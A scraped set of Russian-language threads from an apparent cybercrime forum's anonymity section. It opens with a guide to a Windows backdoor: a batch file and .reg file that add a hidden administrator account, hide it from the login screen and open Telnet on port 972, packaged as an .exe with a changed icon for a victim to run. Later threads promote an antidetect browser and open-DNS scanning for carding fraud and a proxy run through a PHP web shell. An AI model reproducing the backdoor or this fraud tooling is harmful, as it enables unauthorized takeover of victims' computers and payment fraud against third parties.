— А для чего интернет?? WWW — World Wide Web — ВСЕМИРНАЯ паутина.
Через интернет тоже можно установить программу на чужой компьютер/или открыть доступ к уже существующему.
Radmin если что, тоже идет в стандартной комплектации Windows. А установить, что это действительно Windows, можно тем же сканером. Значит — нам остается только открыть доступ к этому сервису (23). Об этом до нас тоже позаботились, и написали вот такой *.txt файл, который в последствии переименовывается в *.bat.
Затем создается еще один файл, файл конфигурации реестра, который скрывает нового пользователя с глаз, и его не видно в окне приветствия.

содержимое *.bat файла
++++
chcp 1251
net user SUPPORT_388945a0 /delete
net user restot 12345678 /add
net localgroup Администраторы restot /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
++++

Этим файлом Вы создаете нового пользователя с именем restot и паролем 12345678
импортируете в реестр настройки, которые скроют Ваше имя в окне приветствия.
открываете 972 порт, и активируете телнет через него.

Записывается без плюсиков в блокнот, потом меняется расширение на *.bat

теперь содержимое файла conf.reg
++++
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
«restot»=dword:00000000
++++

В последней строке, в кавычках, пишите имя, которое указали в *.bat файле.
также записываете в блокнот, а потом меняете расширение на *.reg

сохраняете все это в одной папке, можно просто заархивировать оба файла в один архив, а можно поступить умнее, скомпилировать файл *.bat в файл *.exe, и также добавить в архив поменяв иконку, об этом читайте в статьях на портале. После того как жертва запустит батник, можно будет коннектиться к 972 порту, или к любому другому, главное чтобы не был занят...

затем можно установить то что нужно через службу Telnet, и более комфортно управлять удаленной машиной.

5.) Краткая теориия|||

находите жертву >>> узнаете ip >>> проверяете на наличие открытых портов >>> открываете порты (если открытых не было) >>> устанавливаете через telnet то что нужно для удобство >>> осуществляете свой злобный план…

Тестирование антидетекта - ищу бета-тестеров

ID: 676533bbb4103b69df371d11
Thread ID: 30088
Created: 2019-07-01T03:03:42+0000
Last Post: 2019-11-03T23:33:28+0000
Author: gcc
Replies: 18 Views: 5K

Занимаюсь разработкой антидетекта на основе chrome браузера.
На текущий момент продукт находится на стадии бета-тестирования.
Реализованы подмены:
- Данных о бразуере
- Перехват и подмена данных при стандартных техниках фингерпринтинга (audio, canvas, web gl, fonts, ...)
- Кастомизации подмен фингерпринта для различных сайтов (сейчас готовы кастомизации для paypal.com и bestbuy.com. Готовится для facebook).

Очень нужны грамотные бета-тестеры (работающие в теме вбива и арбитража).
Кодовая база довольно большая и в некоторых местах еще сыровато.
Буду крайне признателен за Вашу помощь в тестировании и информации о багах (баг репортах).
На текущий момент никаких продаж не осуществляю. Для тестеров все абсолютно бесплатно.

С радостью предоставлю все что требуется для тестирования. Софт и информацию по настройке.
Стучите в жабу: gcc@bombolenath.site

[Paranoid] (Codeby) нужна помощ

ID: 676533bbb4103b69df371d15
Thread ID: 31945
Created: 2019-09-21T18:48:44+0000
Last Post: 2019-10-28T10:05:39+0000
Author: AEIOU
Replies: 17 Views: 5K

этот пак мне нужно разбить на две части (скинуть сылками пак разделеный по отдельности от тогоже мега в коменты под эту тему (не мне в личку))
либо загрузить полный пак на какойто другой сайт где сразу можно выбрать папку загрузки как только нажимаеш на кнопку скачать
а не ждать пока весь пак загрузится на самом сайте (у меня из за этого операционная система падает) и только потом скачивать его себе на машину
(либо "расказать" мне о какойто магии которая решит "все мои проблемы")

(P.S. кто первый поможет (ну вы поняли (не тот кто первый "скинет сылку а она не будет работать")) тому постараюсь пролайкать как можно больше сообщений который он пооставлял)

Как избежать утечки трафика при падении VPN

ID: 676533bbb4103b69df371d33
Thread ID: 27123
Created: 2019-01-03T18:32:41+0000
Last Post: 2019-09-05T16:42:03+0000
Author: Hide
Replies: 16 Views: 5K

Многим знакома ситуация, когда падает ВПН и все приложения (jabber, ICQ, браузеры и пр.) начинают идти в интернет напрямую. Если падения впн незаметить и продолжить работать дальше, то провайдер видит весь наш трафик, соответственно видит чем мы занимаемся и на каком сайте сейчас сидим. Не говоря уже о том, что ты палишь свой реальный айпи.

Сразу отмечу, что данный мануал подойдёт для любого впн, любых конфигов и пр. Самое главное, чтобы нам был известен мак адрес нашего виртуального адаптера, который подключается к впн серверу. Узнать его не проблема, всё описано в данном мануале.

Предотвратить можно несколькими способами:

Самый простой, его много кто знает. Это OpenVPN Protector.
Подходит только для OpenVPN gui. При отключении VPN он полностью отключает интернет, предварительно спросив пользователя об этом.
Этот способ затрагивать вообще не буду, т.к. там всё просто.
Есть и другие подобные приложения, специально под эту тему, но лично я им не доверяю. Такие проги находятся на всяких форумах, поэтому большие шансы того, что к прогам идет какое-то нехорошее дополнение. Поэтому я в этом вопросе использую настройку фаервола.
Настроить фаервол. У меня стоит Comodo Internet security Premium 8,2. Он бесплатный, скачать можно с официального сайта. Также можно использовать другой фаервол, если каким-нибудь уже пользуетесь, настройка для него будет похожей.

Окей, погнали!

Этап установки. Снимаем галочки, сами понимаете зачем.
Жмём настроить установку, тут выбираем на свой вкус, если у вас стоит антивирус, то ав комодо не ставим.

3)После установки, Comodo сразу начнёт обновлять антивирусные базы, затем сканировать вашу систему, и попросит перезагрузиться. А так же задаст такой вопрос. От данной сети нам нужет только интернет. Поэтому выбираем её как общественное место.

Окей, перезагрузились. Заходим в настройки.
Я меняю конфигурацию, мне нужна защита в активном времени, так как других антивирусов у меня нет, Также для нас подойдёт Firewall security. Комодо попросит перезагрузки!
Итак, самое главное.

Настройки фаервола -> Сетевые зоны (добавляем сетевую зону / затем добавляем мак адрес) мак адрес нашего впн адаптера

7)И прописываем МАК адрес.
(Окошко с выпадающем меню, в самом низу выбираем пункт мак адрес)

А где же узнать мак адрес нашего виртуальго адаптера? Можно в двух местах

И введя в командной строке команду ipconfig /all

Ищем TAP-Windows Adapter V9, Через который работает наш ВПН
и прописываем его в комодо, в нашу созданную сетевую зону.

8)Окей, едем дальше. Создадим набор простых правил

1. Разрешить входящий IP трафик из любой сети в сетевую зону VPN
2. Разрешить исходящий IP трафик из сетевой зоны VPN в любую сеть
3. Запретить любой входящий и исходящий IP трафик

Почти готово!!!

9)Переходим во вкладку правила для приложений.

10)И добавляем приложения которым хотим ограничить доступ в интернет напрямую. Применив к ним набор наших созданных правил.

Также хочу отметить, что можно добавить группы приложений, например все веб браузеры.

PS. Заметил одну особенность. Имеем 2 браузера портабл: iron портабл и мозилла портабл. Добавляем правила для них с полным указанием пути к файлу. НО почему то именно эти браузеры от Portableapps.com работают и выходят в интернет, как с впн так и без впн. Как будто комодо для них вообще не существует.
Решение: Создать правило для всех веб браузеров как на скриншоте выше.
Для других приложений от Portableapps.com не тестил

PPS. Комодо хороший фаервол с множеством настроек, подходит как для профи так и для новичков. То, что описано в этой статье, это цветочки, он способен на многое. Всех настроек я описывать не стал, но его HIPS защита реагирует на многие объекты которые даже не представляют никакой опасности. Её можно отключить, если уверены, что у вас чистый пк. Или по умолчанию разрешать все запросы, чтоб вас не мучали всплывающие оповещания.
А вообще все скачанные файлы и всю работу нужно производить в виртуалке!

PPPS. Также я активировал следующие настройки.

Стандартные глобальные правила

Вот и всё. Теперь если впн упал, то трафик не будет идти и мы не спалим свой реальный айпи адрес.

Является ли NordVPN большим ботнетом...

ID: 676533bbb4103b69df371d48
Thread ID: 29940
Created: 2019-06-24T07:07:40+0000
Last Post: 2019-06-28T19:59:36+0000
Author: amstrot
Replies: 15 Views: 5K

Исследователи безопасности и пользователи всерьез обеспокоены странным поведением NordVPN, которое разработчики приложения не могут толком объяснить. Как оказалось, NordVPN подключается к странным доменам подобно тому, как скомпрометированные системы подключаются к C&C-серверам ботнетов.

О том, что происходит что-то неладное, первым сообщил читатель сетевого издания The Register по имени Дэн (Dan). Установленные в его офисной сети решения безопасности вдруг начали выдавать предупреждения о подозрительном трафике с ноутбука одного из посетителей. Как показал анализ записей журнала, устройство подключалось к нескольким «мусорным» доменам.

Странный трафик также был обнаружен исследователем безопасности Райаном Нимесом (Ryan Niemes). Однако Нимес выявил еще одну вещь – у подозрительных доменов отсутствовал владелец. Исследователь купил их и запустил EC2 с целью выяснить, что же на самом деле происходит. Запустив команду netstat, он увидел подключение к порту 443. «Я зарегистрировал сертификат Letsencrypt и стал наблюдать за появлением записей в журнале», – сообщил Нимес.

Исследователь в частном порядке уведомил разработчиков NordVPN о своей находке, и в качестве благодарности получил три года бесплатной подписки. Разработчики пообещали исправить проблему, однако после выхода обновлений подозрительные подключения никуда не делись. Нимес установил обновленную версию NordVPN для тестирования и обнаружил входящие подключения, устанавливаемые клиентами с «NordVPN» в строках user-agent.

Исследователь обнаружил внутри HTTPS-трафика запросы API уже к другим доменам. «Обнаруженные мною POST-запросы вызывают опасения, так как поле renewtoken является уникальным», - заметил Нимес. По его словам, строка user-agent и запросы раскрывали версию приложения, сборку ОС хоста и адрес IPv4 пользователя.

Ссылка на исследование: Тыц
Является ли NordVPN большим ботнетом, решать только вам , компания заявляет, подключение к странным доменам является частью механизма для обхода блокировок. Однако специалисты по бесзопасности сильно в этом усомнились.

В свою очередь хотелось бы сказать ни один комерческий VPN не безопасен.

Автор: @black_triangle_tg

Ваш TrueCrypt шпионит за вами

ID: 676533bbb4103b69df371d70
Thread ID: 27267
Created: 2019-01-12T17:22:24+0000
Last Post: 2019-02-11T04:10:41+0000
Author: lukas
Replies: 12 Views: 5K

В этом материале еще раз хотим напомнить о необходимости устанавливать программное обеспечение только из проверенных источников. TrueCrypt тут не исключение. Поскольку скачать безопасную версию программы с официального сайта уже не представляется возможным, мы рекомендуем ее скачивать из надежного источника, а иначе…

А иначе у вас могут быть большие проблемы. В 2015 году компания ESET опубликовала расследование, посвященное распространению в русскоязычном сегменте интернета TrueCrypt с трояном Win32/Potao. Вредоносное программное обеспечение (далее - ПО) разносилось через сайт www.truecryptrussia.ru, который, вероятно, был создан специально для распространения зараженной версии программы. На момент написания статьи сайт Truecryptrussia выводился на 3-м месте в Яндексе по запросу «TrueCrypt». И, конечно, Truecryptrussia - только один из множества сайтов, распространяющих вредоносное ПО.

По мнению специалистов компании ESET, вредоносное ПО Potao предназначено для кибершпионажа и извлечения различной конфиденциальной информации жертвы с последующей отправкой злоумышленникам.

Только представьте: вы вводите в поисковой системе «TrueCrypt», скачиваете зараженную версию, шифруете ею свои самые ценные файлы, надеясь надежно защитить их, а они уходят к злоумышленникам, и вместе с ними множество другой важной информации, включая ваши пароли, информацию об активности в сети, файлы на жестком диске.

После установки скомпрометированной версии TrueCrypt злоумышленники могут наблюдать за вами через камеру, слушать вас через микрофон, видеть ваш экран. Рассчитывая защитить ценные данные, вы своими руками установили себе идеального шпиона.

По мнению ряда экспертов, вредоносная версия программы TrueCrypt использовалась в интересах правоохранительных органов и правительственных структур Российской Федерации. Но это не более, чем предположение.

Если вы уже скачивали TrueCrypt из сомнительного источника, мы настоятельно рекомендуем вам переустановить систему, пересмотрев свое отношение к безопасности. Во-первых, необходимо принять, что ваша личная информация вероятно уже не только ваша. Во-вторых, осознать, что все время с момента установки скомпрометированной версии TrueCrypt за вами могли следить.

Анонимность - недоступная роскошь

ID: 676533bbb4103b69df371d7b
Thread ID: 26783
Created: 2018-12-06T20:28:57+0000
Last Post: 2019-01-21T13:22:15+0000
Author: h0peIess
Prefix: Статья
Replies: 16 Views: 5K

Деанонимизация пользователей

Хэй, каждый юзер, который работает в теневой сфере интернета обязан знать информацию, предоставленную здесь! Начнем с определения...

Деанонимизация (деанон) — нарушение анонимности, заключающееся в публикации персональных данных пользователя Интернета. Под деанонимизацией может также пониматься сопоставление нескольких аккаунтов одного человека на одном или нескольких интернет-сайтах.
В статье будут разоблачены некоторые мифы насчет приватности, а также будет рассказано о различных методах сокрытия себя в сети(но не о всех).

VirtualBox

Виртуальная машина – программа, которая эмулирует аппаратное обеспечение компьютера, т.е. это некий виртуальный компьютер, на который можно устанавливать операционку и все сопутствующее программное обеспечение, при этом никаких изменений в вашей основной операционной системе не будет.

Для чего нужен данный софт?

**Есть достаточно много причин, по которым пользователя может заинтересовать данная утилита. Но в нашей статье я расскажу только об одной из них... Виртуальная машина защитит от определенного типа malware, которое способно определить наш IP. Впрочем все, но не упомянуть об этом я не мог.
**

Анонимные Операционные Системы

На данный момент существует множество таковых. К примеру: Qubes, Tails, Whonix, Liberty Linux, JonDo.

Все рассматривать мы не будем =), пройдемся по самым популярным: Tails, Whonix, Qubes.

Здесь не будет рассказано о “дырах” в этих системах (они есть в технологиях, используемых в них), планирую рассказать для общего развития.

Tails

Скорее всего, эта самая известная анонимная операционная система на данный момент, можно сказать спасибо за это Эдварду Сноудену, который использовал ее во время своих похождений. Tails основан на Debian (дистрибутив linux), запускается OS с флешки в Live режиме, предоставляет достаточно большой выбор софта для обеспечения анонимности. Кстати, после завершения работы, Tails не оставляет никаких следов в системе, а также, если резко вытащить флешку, произойдет немедленный Reboot! Особенность системы заключается в том, что абсолютно ВСЕ соединения проходят через сеть TOR. Tails настроена так, что ни одна программа не обращается к жесткому диску и не сохраняет на него свои данные, следовательно, после завершения сеанса восстановить, например, переписку не представляется возможным.

Qubes OS

**
Операционная система, которая сильно отличается от нашего прошлого кандидата. Она призвана обеспечить нашу с вами безопасность, используя виртуализацию (принцип виртуальной машины). Она запускает абсолютно все приложения в виртуальной машине. Забавно и то, что функция LiveUSB не поддерживается, хотя образ доступен для загрузки. Виртуализация проявляется в 2 категориях: программы и оборудование. Программы разделяются по доменам с различным уровнем доступа. Но запуск в виртуальной машине отличается от запуска напрямую в операционной системе. Qubes использует виртуализацию для изоляции приложений. Например ваш интернет браузер останется в другой рабочей среде, не там где его файлы. Этот спасает если уязвимость позволит хакеру получить доступ к командной оболочке вашей системы.**

Whonix

**
Whonix достаточно хорошая система, которая отчасти комбинирует в себе преимущества Tails и Qubes OS. Честно говоря, выбрал бы именно этот вариант. Кроме используемых в Tails методов защиты от утечек и фингерпринтинга, здесь реализована довольно интересная архитектура с применением виртуализации. Whonix распространяется в двух образах VirtualBox: один играет роль шлюза в глобальную сеть через Tor, а второй — рабочая машина с различным софтом, в том числе тем, что можно установить из репозиториев. Оба образа основаны на Debian. Единственный способ выйти во внешний мир для рабочей машины — это шлюз, единственный путь трафика во внешний мир из шлюза и обратно — через сеть Tor. Неважно, насколько протекающий софт ты установишь на рабочую машину, он все равно тебя не выдаст. Считаю, что единственный минус этой системы заключается в ее неудобстве.**

VPN, PROXY

**Вопрос: кто сказал, что VPN, PROXY является пригодным для анонимности?

Наипопулярнейшие аргументы:

VPN, PROXY сообщает на своем оффициальном сайте, что он не ведет логов**

**2) Многие пользуются услугами VPN, PROXY

Иван Иванович (aka профессионал) сказал, что это надежный метод стать “невидимым”

Все это полнейшая чушь!

Существуют как платные, так и бесплатные VPN, PROXY. Еще глупее полагать, что бесплатный VPN, PROXY на что-то способен, не возникала ли у вас мысль: откуда у них денежные средства на зарплату сотрудников, налоги, аренду, оборудование и т.д ?

Ответ прост – продажа логов. Пруфы можно легко найти в интернете, Google еще не запретили. Вычеркиваем из списка бесплатные VPN, PROXY.

~~Бесплатный VPN, PROXY~~

Казалось бы, ну с платными же все наоборот? Отнюдь, к сожалению, и здесь не все просто. Мнение создателей Tails:

https://tails.boum.org/blueprint/vpn_support/

Если кратко, то создатели говорят, что они не рекомендуют использовать только VPN, PROXY, советуют его использовать с их OS. Честно говоря, я и с этим не согласен.

Возникает вопрос: а почему количество серверов не улучшает анонимность.

Поясняю:

**Цепочка: [user] = > [node_1] => [node_2] => [INTERNET]**

Если узлы не являются перманентными, то данной цепочки уже “достаточно”. При это мы имеем лишь 2 сервера, на которых возможно останется нежелательная для нас информация.

Если же увеличить кол-во nod’ov, то ничего особо не изменится, так как у нас по прежнему есть user и конечный узел без “слабого места” , однако кол-во серверов с нежелательной для нас информацией увеличится =(. Это означает, что дальнешое увеличение промежуточных узлов будет уменьшать нашу защиту.

Итог: сотрудники знают ваш IP, видят, что вы совершаете какие-то незаконные действия. Нет никакой гарантии, что сервис, предоставляющий данные услуги, имея множество пользователей, спасет именно вашу задницу при запросе из правоохранительных органов.

TOR

Сложно представить себе человека, который пользуется интернетом и не разу не слышал о DeepWeb’e – страницы, которые не индексируются поисковиками. В DeepWeb’e есть DarkNet – закрытый участок сети, который доступен не всем, лишь пользователям определенных программ. Таких как Tor и I2P. Расскажу вам о наиболее популярной из них – Tor.

Изначально Tor передает трафик через 3 узла (входной, помежуточный, выходной), каждый из них играет определенную роль в этой цепочке. Входные узлы выбираются из тех, что работают продолжительное время, и показали себя как стабильные. Промежуточный узел передаёт трафик от охранных к выходным. В результате первые не знают ничего о последних. Выходной узел - точка выхода из сети, отправляет трафик к пункту назначения, который нужен клиенту. Также узлы сменяются каждые 10 минут. Вникать в сложности шифрования мы здесь не будем =).

Однако у Tor’a существует ряд проблем...

К примеру, исследователи из MIT установили, что Flash Player (программа, позволяющая просматривать флеш-контент веб-сайтов: видео, аудио) создает канал связи между сервером злоумышленника, который фиксирует реальный IP клиента. Слава тебе господи, разработчики быстро это поправили и вырезали обработчик Flash-контента, в новых версиях это уже неактуально...

Однако с приходом HTML5 пришли новые проблемы. WebRTC – заноза, которая также создает канал передачи видеопотока между браузерами.

Также можно составить фингерпринт пользователя при помощи определенных функций Javascript’a, которые работают с текстом, из-за того, что мы используем различное оборудование, отрисовка текста у всех происходит по-разному. Как показывает практика, у 90% пользователей результаты уникальны. Вот эти функции:
1)measureText()
2)getBoundingClientRect()

Существует достаточно много различных способов деанонимизировать пользователя, как минимум, я не упомянул о проблеме выходных узлов Tor’a, DRM подписи и т.д. Однако, пройдет целая вечность, прежде, чем я расскажу о всех из них. Как мы уже поняли, анонимность – миф. Можно лишь обезопасить себя и увеличить время на свои поиски, на этой грустной ноте я заканчиваю свою статью...

Удачи!

**Связь:h0peIess (Telegram)

Где достать и как заюзать левые DNS.

ID: 676533bbb4103b69df371dba
Thread ID: 21118
Created: 2011-02-12T00:11:41+0000
Last Post: 2012-01-20T16:46:51+0000
Author: Dr.Samuil
Replies: 14 Views: 5K

1. Начало

Неоднократно на форумах подобной тематики встречал вопросы о том, как заюзать левые DNS.
Заюзать их, дело не хитрое, возникает следующий вопрос: а где-же их (DNS) взять?
Некоторые доброходы набивают посты тем, что выкладывают пару штук из своих списков и/или дают пабловые.
Всё это конечно хорошо. Есть один минус, приходится юзать то, что дают!
Я предлагаю, в корне закрыть эту тему и воспользоваться уникальным способом )))
В данной теме мы разберем всё это подробно и в картинках.

2. Зачем это нужно.

Если вы пользуетесь OpenVPN/DoubleVPN, это еще не значит, что Вы полностью спрятали своё заднее место.
Воспользуемся, по моему, одним из лучших сервисов проверки своего IP.
Заходим сюда: http://whoer.net/extended
В моём случае получилось вот что:

Как видите, мой IP отличается от DNS.
Во время вбива, нам это не нужно.

3. Начинаем охоту за DNS!

Для начала нам понадобится достать списки диапазонов IP по странам.
Взять такой список можно здесь:
http://www.proxysecurity.com/ip-address-range.php
В моем случае, желательно заюзать DNS из United Kingdom.
Итак, выбираем нужную страну из списка и получаем диапазон IP.
Это может быть диапазон в котором находитесь Вы/Ваш SOCKS/Ваш PROXY/Ваш вариант.
Лично я возьму эти диапазоны:

Code:Copy to clipboard

81.178.0.0 - 81.179.255.255  United kingdom
81.187.0.0 - 81.187.255.255  United kingdom
81.201.128.0 - 81.201.175.255  United kingdom
81.208.128.0 - 81.208.255.255  United kingdom
82.0.0.0 - 82.47.255.255  United kingdom
82.68.0.0 - 82.71.255.255  United kingdom
82.108.0.0 - 82.111.255.255  United kingdom
82.112.96.0 - 82.112.159.255  United kingdom
82.112.224.0 - 82.112.255.255  United kingdom
82.113.64.0 - 82.113.95.255  United kingdom

Открываем блокнот и приводим этот список к такому виду:

Code:Copy to clipboard

VNC.exe -i 81.178.0.0-81.179.255.255 -p 53 -cT
VNC.exe -i 81.187.0.0-81.187.255.255 -p 53 -cT
VNC.exe -i 81.201.128.0-81.201.175.255 -p 53 -cT
VNC.exe -i 81.208.128.0-81.208.255.255 -p 53 -cT
VNC.exe -i 82.0.0.0-82.47.255.255 -p 53 -cT
VNC.exe -i 82.68.0.0-82.71.255.255 -p 53 -cT
VNC.exe -i 82.108.0.0-82.111.255.255 -p 53 -cT
VNC.exe -i 82.112.96.0-82.112.159.255 -p 53 -cT
VNC.exe -i 82.112.224.0-82.112.255.255 -p 53 -cT
VNC.exe -i 82.113.64.0-82.113.95.255 -p 53 -cT

Сохраняем этот текст, в файл, с именем "scan.bat", в предварительно созданную папку DNS, на рабочем столе ;-)
Качаем вот-это: https://xss.is/index.php?act=Attach&type=post&id=2335
И ложим VNC.exe в папку рядом с файлом scan.bat.
Открываем заранее приготовленный scan.bat и получаем вот такое окно:

Ожидаем окончание сканирования и в папке появляется файл "VNC_bypauth.txt"
с примерно таким подержимым:

Code:Copy to clipboard

----------------------------------------------------------------------------
COMMAND: VNC.exe -i 81.178.0.0-81.179.255.255 -p 53 -cT 
----------------------------------------------------------------------------
81.178.0.15    :53     
81.178.0.214   :53     
81.178.1.76    :53     
81.178.1.138   :53     
81.178.12.148  :53     
81.178.14.73   :53     
81.178.15.156  :53     
81.178.18.54   :53     
81.178.19.190  :53     
81.178.27.85   :53

Как Вы могли догадаться, мои дорогие друзья, это и есть наши насканенные DNS!
Осталось их попробовать в деле.

4. Какой-же нам подойдет???

Прикол в том, что не всё то золото, что блестит.
Так и в нашем случае. Я надеюсь что Вы, все знаете как вбивать собственные DNS в настройки Вашего подключения.
Если да, то можно пропустить эту часть саги.
Если нет, смотрим на картинки )))
В данном примере используется Windows 7. С другими ОС, думаю, проблем у Вас не возникнет.
Итак, окрываем свойства подключения как на картинке:

и...

5. Вот он, тот который нужен!!!

... и начинаем упорно вписывать каждый IP из списка.
Каждый раз после такого "вбива" не забываем провериться здесь: http://whoer.net/extended
Я вбил самый первый IP (81.178.0.15), который был в списке, мне повезло.

Как видно на картинке выше, я добился того, чего хотел: я заюзал левый DNS.
Кстати, в данном случае, на выходе я получил IP 212.74.114.213, почему так произошло?
Это не важно, есть куча DNS которые будут давать на выходе свой, родной IP и нужный Вам.

6. Оконцовочка ;-)

Вобщем думаю Ты, уважаемый читатель, сможешь теперь самостоятельно найти нужный тебе DNS сервер!
Старался разжевать как мог! Если что-то не понятно, спрашивай в этом топике, постараюсь ответить.
Кроме того, хочу передать приветы хорошим кексам со сл. никами: gustav, d1g1t0x, lukmus, Ar3s, TrueUser, amm0.
Отдельные БИГ приветы: .sn4ke, XPOM, [gh0st], The $@D!$T, dMNt.

7. Копирайты:
Статья (или просто заметка) написана мной: Dr.Samuil
Надеюсь она Вам поможет/понравилась...
Вечно Ваш, Доктор Самуил. 12 февраля 2011 года. 02:50 по МСК времени.

Proxifier 2.8

ID: 676533bbb4103b69df371dc0
Thread ID: 17374
Created: 2009-04-12T19:29:32+0000
Last Post: 2010-10-25T07:18:12+0000
Author: ammok
Replies: 14 Views: 5K

Proxifier

Proxifier — программа, позволяющая сетевым програмам не имеющим возможность работать через прокси сервера обходить это ограничение. С Proxifier вы можете работать с любыми интернет клиентами (браузеры, ftp, ICQ, IRC, Kazaa, Telnet, ssh, видео и аудио, играми, и т.п.) из сети, которая отделена от Интернета файерволом (необходим только один открытый порт). Proxifier поможет обеспечить секретность вашей информации, посылать и получать e-mail через прокси сервер, или цепь прокси серверов. Все почтовые клиенты поддерживаются (Outlook, Eudora, Netscape и другие).

Click to expand...

:zns2: Домашняя страница
:screenshot: Скриншот|Screenshot
:zns5: Скачать|Download

Spoiler: 10

Proxifier Portable Edition 2.91 + Lince Key
:zns5: Скачать|Download
Отличия версий узнать можно по адресу: http://www.proxifier.com/documentation/editions.htm

Сервис проверки анонимности

ID: 676533bbb4103b69df371dd0
Thread ID: 17521
Created: 2009-05-08T22:39:19+0000
Last Post: 2009-05-18T03:02:42+0000
Author: lisa99
Replies: 9 Views: 5K

Попалась реклама сервиса по проверке полных данных о посетителе.

http://www.whoer.net/ext

А кто является лидером среди подобных сервисов? Насколько можно доверять встроенному в них чекеру прокси?

Как поднять VPN на Win2003?

ID: 676533bbb4103b69df371dd3
Thread ID: 17432
Created: 2009-04-25T12:15:42+0000
Last Post: 2009-04-26T10:53:57+0000
Author: -StorM-
Replies: 5 Views: 5K

Собственно сабж,интересует OpenVpn или VPN на Win2003.
ПОдскажите мануалы,заранее спасибо

халявныЙ VPN

ID: 676533bbb4103b69df371dd7
Thread ID: 15277
Created: 2008-07-24T16:31:48+0000
Last Post: 2009-03-16T00:20:22+0000
Author: @r4@yo
Replies: 13 Views: 5K

лазая в просторах интернета нашел сервис VPN разрешающий 30 дней воспользоваться бесплатно humbsup: вот собственно адрес https://www.relakks.com

VPN

ID: 676533bbb4103b69df371ddd
Thread ID: 10378
Created: 2006-08-08T07:31:45+0000
Last Post: 2008-06-17T18:06:25+0000
Author: mujestveniy
Replies: 10 Views: 5K

Доброе время суток. Я вот чайник начинающий .Просто сидеть в инэте надоело сам живу в штатах. Имею хорошую сорость 30 мигабит. Вот начинаю увлекаться темой. Подскажите проверенный временем vpn канал proxy не устраивает .Кто что знает об этом сайте www.megaproxy.com и о VPN Заранее блогадарен.

Релиз Satanic Socks Server

ID: 676533bbb4103b69df371de4
Thread ID: 8524
Created: 2006-05-20T09:05:48+0000
Last Post: 2006-11-06T06:20:54+0000
Author: Winux
Replies: 8 Views: 5K

Satanic Socks Server v0.66
Основные характеристики:
- Протокол Socks5
- Написан на Си
- Компилируется в Unix и Windows системах
- Не требует root-привелегий
- Размер бинарника в формате PE: 2,5 Кб
- Поддерживается аудентификация по логину:паролю
- Клиент может передавать адрес сервера как в виде D/N, так и в виде IPv4
- Поддерживается только метод connect.
- Исходник занимает 1 файл размером менее 10Кб
:zns2: Домашняя страница

Обеспечение анонимности в сети

ID: 676533bbb4103b69df371de8
Thread ID: 11808
Created: 2006-09-18T19:03:03+0000
Last Post: 2006-10-23T04:26:21+0000
Author: Winux
Replies: 16 Views: 5K

Собственно вечный вопрос, каждый считает наилучшим то, чем пользуется сам.
А что используешь ТЫ?

VPN

ID: 676533bbb4103b69df371df6
Thread ID: 9877
Created: 2006-07-13T19:39:32+0000
Last Post: 2006-08-05T10:45:06+0000
Author: lucifer
Replies: 17 Views: 5K

Приветствую.
Хотел задать пару вопросов про ВПН. Что представляет из себя эта услуга? У меня сейчас стоит сервер, я через связку ВПН+НАТ раздаю интернет, это тот же самый ВПН? Если нет то как устроен этот сервис.

Socks5 Server v 1.0

ID: 676533bbb4103b69df371df0
Thread ID: 10993
Created: 2006-08-28T13:23:13+0000
Last Post: 2006-09-04T12:26:43+0000
Author: [br]
Replies: 11 Views: 4K

все что нужно - пхп шэл + включенный settimelimit(0).

правим скрипт (по умолчанию пароль отрублен и порт - 4001)
заливаем его.. . ищем интерепретаор пхп (which php) например он у вас в /usr/bin/php тогда для установки проксика вводим

Code:Copy to clipboard

/usr/bin/php /~путь до скрипта~/socks5.php

собсно скрипт ТУТ

Software / Hardware (все темы)

ID: 676533bbb4103b69df3718d5
Thread ID: 103446
Created: 2023-12-03T19:19:59+0000
Last Post: 2024-12-18T15:13:51+0000
Author: r_as
Replies: 55 Views: 4K

Тема:
- Подмена фингерпринта - /threads/97615/
- LTE модем с изменяемым MACом - /threads/65570/
- Подмена МАС-адреса - /threads/27236/

Статья:
- Идентификация железа - /threads/51786/

Правовые вопросы, все темы

ID: 676533bbb4103b69df3718dc
Thread ID: 86984
Created: 2023-04-30T12:53:40+0000
Last Post: 2024-11-19T15:59:03+0000
Author: r_as
Replies: 2 Views: 4K

- Общая тема - Правовые вопросы
- Статья - Что делать и как вести себя при задержании
- Статья - ФБР не разглашает свое причастие ко взлому сайта ИГИЛ в даркнете
- Статья - Как меня принять пытались. Или история о том как сохранить анонимность.
- Статья - Экстрадиция миф или реальность?
- Статья - Роскомнадзор начал блокировать VPN- сервисы
- Статья - Как тебя посадят?
- Статья - Средства, применяемые экспертами при проведении экспертиз
- Статья - Статья Computer Forensics (азы компьютерно-технической экспертизы)
- Статья - Киберпреступные форумы навсегда - Часть 1: Киберкрайм никогда не умрет
- Мануал/Книга Книга - «Как я украл миллион»
- Обсуждение - Публичные базы, правовая основа использования
- Обсуждение - Последствия 210 статьи УК РФ на наш бизнес.

Создаем свой Whonix. (роутер через тор)

ID: 676533bbb4103b69df3718df
Thread ID: 105292
Created: 2024-01-07T20:51:10+0000
Last Post: 2024-02-16T13:02:45+0000
Author: D3buG
Prefix: Статья
Replies: 7 Views: 4K

**Оглавление
Введение
Часть 0. Базовое программное обеспечение.
Часть 1. Сетевые интерфейсы
Часть 2. Настройка tor
Часть 3. Настройка редиректа трафика
Часть 4. Автоматизация
Часть 5. Как подрубиться к шлюзу с клиента
Часть 6. Заключение

Введение**
Наверняка каждый из вас слышал про сборку Whonix. А также наверняка вас посещали мысли о том, что это потенциальный хонипот.
Вот и меня, пока я читал очередной тред в анонимности, посетила такая мысль. Ведь это действительно удобно создать инструмент для блэчеров и сидеть мониторить их. Но что нам мешает создать свой хуникс-гейт? По сути ничего.
Ведь всё что делает хуникс гейт так это берёт трафик с одного интерфейса и перенаправляет в тор через другой. Больше ничего волшебного по сути не происходит. В целом не сложно сообразить как это сделать, имея базовые знания в администрировании юникс систем.
Так давайте сделаем свой, чтобы не паранойить лишний раз.

Часть 0. Базовое программное обеспечение.
В качестве базы возьмем Debian 12. Давайте еще не будем разводить холивар, что дебиан в теории тоже может быть протрояненным (там же системудэ ) и что мы всё равно не смотрим его сорсы.
Просто скачайте дебиан 12 с офф сайта, проверьте хэш суммы и установить на виртуалку
Не ставьте никакое оконное окружение. Максимум - доставьте ssh. Оконное окружение нам не пригодится, так как эта система будет выступать в качестве роутера.
А написать пару команд для поднятия тора, я думаю Вы в силах.

